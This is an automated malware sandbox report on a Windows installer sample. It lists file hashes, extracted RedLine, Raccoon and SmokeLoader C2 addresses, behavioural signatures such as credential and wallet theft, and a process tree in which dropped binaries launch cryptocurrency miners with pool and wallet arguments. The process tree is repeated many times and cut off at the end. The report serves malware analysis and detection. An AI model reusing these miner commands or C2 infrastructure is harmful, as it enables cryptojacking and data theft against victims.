Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    602s
  • max time network
    561s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    04-05-2021 05:23

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

redline

Botnet

500S

C2

kystearlar.xyz:80

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 50 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 17 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 34 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 5 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: MapViewOfSection 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
      PID:2788
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2804
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2712
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2588
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2536
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1872
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1396
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1264
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1196
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1076
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:408
                        • C:\Users\Admin\AppData\Roaming\jdwcurh
                          C:\Users\Admin\AppData\Roaming\jdwcurh
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:3200
                          • C:\Users\Admin\AppData\Roaming\jdwcurh
                            C:\Users\Admin\AppData\Roaming\jdwcurh
                            3⤵
                            • Executes dropped EXE
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:4704
                        • C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe
                          C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe
                          2⤵
                          • Suspicious use of SetThreadContext
                          PID:5472
                          • C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe
                            "{path}"
                            3⤵
                            • Suspicious behavior: GetForegroundWindowSpam
                            PID:3200
                            • C:\Users\Admin\AppData\Roaming\WinHost\kernel.exe
                              "C:\Users\Admin\AppData\Roaming\WinHost\kernel.exe" -o pool.minexmr.com:4444 -u 49sjJJDaUPKiSdVsdUR1R51v1ovWXrAZw3QYEDay7qVt3gqxju2anikWRWkZ8ymFfzUyCvw27WP8WV7QvdYVSSrJH26nsXa -p x --max-cpu-usage 40
                              4⤵
                                PID:4300
                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                4⤵
                                  PID:5076
                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                  4⤵
                                    PID:4724
                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                    4⤵
                                      PID:1764
                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                      4⤵
                                        PID:5908
                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                        4⤵
                                          PID:5920
                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                          4⤵
                                            PID:4400
                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                            4⤵
                                              PID:1164
                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                              4⤵
                                                PID:740
                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                4⤵
                                                  PID:4700
                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                  4⤵
                                                    PID:5788
                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                    4⤵
                                                      PID:4868
                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                      4⤵
                                                        PID:2088
                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                        4⤵
                                                          PID:3204
                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                          4⤵
                                                            PID:2064
                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                            4⤵
                                                              PID:4840
                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                              4⤵
                                                                PID:6020
                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                4⤵
                                                                  PID:5944
                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                  4⤵
                                                                    PID:752
                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                    4⤵
                                                                      PID:2068
                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                      4⤵
                                                                        PID:5472
                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                        4⤵
                                                                          PID:4720
                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                          4⤵
                                                                            PID:4420
                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                            4⤵
                                                                              PID:5232
                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                              4⤵
                                                                                PID:4312
                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                4⤵
                                                                                  PID:3560
                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                  4⤵
                                                                                    PID:4380
                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                    4⤵
                                                                                      PID:4564
                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                      4⤵
                                                                                        PID:816
                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                        4⤵
                                                                                          PID:5612
                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                          4⤵
                                                                                            PID:740
                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                            4⤵
                                                                                              PID:4080
                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                              4⤵
                                                                                                PID:5372
                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                4⤵
                                                                                                  PID:64
                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                  4⤵
                                                                                                    PID:2052
                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                    4⤵
                                                                                                      PID:1296
                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                      4⤵
                                                                                                        PID:5012
                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                        4⤵
                                                                                                          PID:4792
                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                          4⤵
                                                                                                            PID:3140
                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                            4⤵
                                                                                                              PID:4884
                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                              4⤵
                                                                                                                PID:3832
                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                4⤵
                                                                                                                  PID:4880
                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                  4⤵
                                                                                                                    PID:5304
                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                    4⤵
                                                                                                                      PID:3880
                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                      4⤵
                                                                                                                        PID:1788
                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                        4⤵
                                                                                                                          PID:2828
                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                          4⤵
                                                                                                                            PID:4436
                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
